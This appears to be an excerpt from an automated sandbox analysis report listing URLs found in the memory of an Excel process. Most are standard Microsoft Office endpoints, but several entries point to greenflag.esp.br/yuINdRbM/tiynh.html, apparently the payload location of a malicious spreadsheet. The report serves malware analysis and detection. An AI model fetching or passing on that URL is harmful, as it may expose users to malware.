      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/)V
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1G
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json#
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlM
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.comq
      Source: EXCEL.EXEString found in binary or memory: https://entity.osi.office.net/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EXCEL.EXE, 00000001.00000003.470099621.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.340254925.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291670975.000000000FEA2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488934838.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461355081.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467269536.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.493139849.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490225001.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475810638.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491199060.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610983542.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419576881.000000000FEA0000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidy
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://graph.ppe.windows.net
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net//
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://graph.windows.net
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://graph.windows.net/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/l
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/ointZ
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.netse
      Source: EXCEL.EXE, 00000001.00000003.526779002.00000000136A7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611442721.00000000136D7000.00000004.00000001.sdmpString found in binary or memory: https://greenflag.esp.br/
      Source: EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419668761.00000000167C6000.00000004.00000001.sdmpString found in binary or memory: https://greenflag.esp.br/yuINdRbM/tiynh.html
      Source: EXCEL.EXE, 00000001.00000003.324828323.00000000167C6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418599518.00000000167C6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419668761.00000000167C6000.00000004.00000001.sdmpString found in binary or memory: https://greenflag.esp.br/yuINdRbM/tiynh.htmlZd
      Source: EXCEL.EXE, 00000001.00000003.526779002.00000000136A7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611442721.00000000136D7000.00000004.00000001.sdmpString found in binary or memory: https://greenflag.esp.br/z
      Source: EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?B
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXEString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000001.00000003.470099621.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.340254925.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291670975.000000000FEA2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488934838.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461355081.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467269536.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.493139849.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490225001.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475810638.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491199060.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610983542.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419576881.000000000FEA0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1i
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000001.00000002.611303760.00000000135FB000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnostics.office.comH
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EXCEL.EXEString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
      Source: EXCEL.EXE, 00000001.00000003.470099621.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.340254925.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291670975.000000000FEA2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488934838.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461355081.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467269536.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.493139849.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490225001.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475810638.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491199060.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610983542.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419576881.000000000FEA0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppR
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Binguo
      Source: EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrYO
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveX2i
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaq
      Source: EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://lifecycle.office.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
      Source: EXCEL.EXE, 00000001.00000003.339645774.0000000013881000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339423306.0000000013879000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418797301.0000000013879000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461136291.0000000013879000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.527925109.0000000013879000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611756255.000000001388E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324103805.0000000013879000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.527045226.0000000013879000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeuo
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://login.windows.local
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizehNd
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%_3
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&Z0
